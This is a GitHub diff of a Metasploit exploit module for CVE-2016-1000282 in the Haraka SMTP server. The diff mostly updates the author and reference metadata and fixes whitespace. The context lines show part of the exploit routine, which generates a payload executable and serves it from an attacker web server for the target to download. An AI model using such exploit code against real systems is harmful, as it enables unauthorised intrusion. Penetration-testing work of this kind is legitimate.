File tree Expand file tree Collapse file tree 1 file changed +6
-5
lines changed
modules/exploits/linux/smtp Expand file tree Collapse file tree 1 file changed +6
-5
lines changed Original file line number Diff line number Diff line change @@ -52,14 +52,15 @@ def initialize(info = {})
52
52
} ,
53
53
'Author' =>
54
54
[
55
- 'xychix / Mark' , # Exploit DB exploit based on github patch
56
- 'xychix / Mark' # Metasploit module
55
+ 'xychix / Mark, Outflank' # Exploit-DB python exploit and msf module
57
56
] ,
58
57
'License' => MSF_LICENSE ,
59
58
'References' =>
60
59
[
61
60
[ 'CVE' , '2016-1000282' ] ,
62
- [ 'URL' , 'https://github.com/outflankbv/Exploits/blob/master/harakiri-CVE-2016-1000282.py' ]
61
+ [ 'EDB-ID' , '41162' ] ,
62
+ [ 'URL' , 'https://github.com/outflankbv/Exploits/blob/master/harakiri-CVE-2016-1000282.py' ] ,
63
+ [ 'URL' , 'https://www.exploit-db.com/exploits/41162/' ]
63
64
] ,
64
65
'Privileged' => false ,
65
66
'Arch' => ARCH_X86 ,
@@ -119,15 +120,15 @@ def on_request_uri(cli, request)
119
120
end
120
121
121
122
def exploit
122
- @pl = generate_payload_exe
123
+ @pl = generate_payload_exe
123
124
@elf_sent = false
124
125
125
126
#
126
127
# start our web server to deploy the final payload
127
128
#
128
129
downfile = datastore [ 'DOWNFILE' ] || rand_text_alpha ( 8 +rand ( 8 ) )
129
130
resource_uri = '/' + downfile
130
- webport = datastore [ 'SRVPORT' ]
131
+ webport = datastore [ 'SRVPORT' ]
131
132
132
133
if ( datastore [ 'DOWNHOST' ] )
133
134
service_url_payload = datastore [ 'DOWNHOST' ] + resource_uri
You can’t perform that action at this time.
0 commit comments